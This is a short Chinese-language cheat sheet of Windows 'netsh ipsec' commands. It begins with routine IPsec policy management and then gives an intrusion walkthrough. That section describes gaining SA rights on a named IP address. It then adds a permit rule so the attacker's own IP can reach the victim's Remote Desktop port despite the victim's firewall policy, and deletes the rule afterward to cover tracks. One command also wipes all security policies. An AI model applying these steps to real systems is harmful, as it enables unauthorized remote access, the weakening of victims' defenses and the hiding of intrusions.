'建立一个筛选器操作
netsh ipsec static add filteraction name=denyact action=block
'加入规则到安全策略XBLUE
netsh ipsec static add rule name=kill3389 policy=XBLUE filterlist=denyip filteraction=denyact
'激活这个策略
netsh ipsec static set policy name=XBLUE assign=y
把安全策略导出
netsh ipsec static exportpolicy d:ip.ipsec
删除所有安全策略
netsh ipsec static del all
把安全策略导入
netsh ipsec static importpolicy d:ip.ipsec
激活这个策略
netsh ipsec static set policy name=策略名称 assign=y
入侵灵活运用
得到了61.90.227.136的sa权限。不过有策略限制,访问不到他的3389。我想用他的3389。
netsh ipsec static add filterlist name=welcomexblue
netsh ipsec static add filter filterlist=welcomexblue srcaddr=220.207.31.249 dstaddr=Me dstport=7892 protocol=TCP
netsh ipsec static add rule name=letxblue policy=ConnRest filterlist=welcomexblue filteraction=Permit
访问结果
可以访问了。
netsh ipsec static del rule name=letxblue policy=ConnRest
更改
netsh ipsec static set filter filterlist=welcomexblue srcaddr=220.207.31.249 dstaddr=Me dstport=3389 protocol=TCP
删除
netsh ipsec static del rule name=letxblue policy=ConnRest
netsh ipsec static del filterlist name=welcomexblue
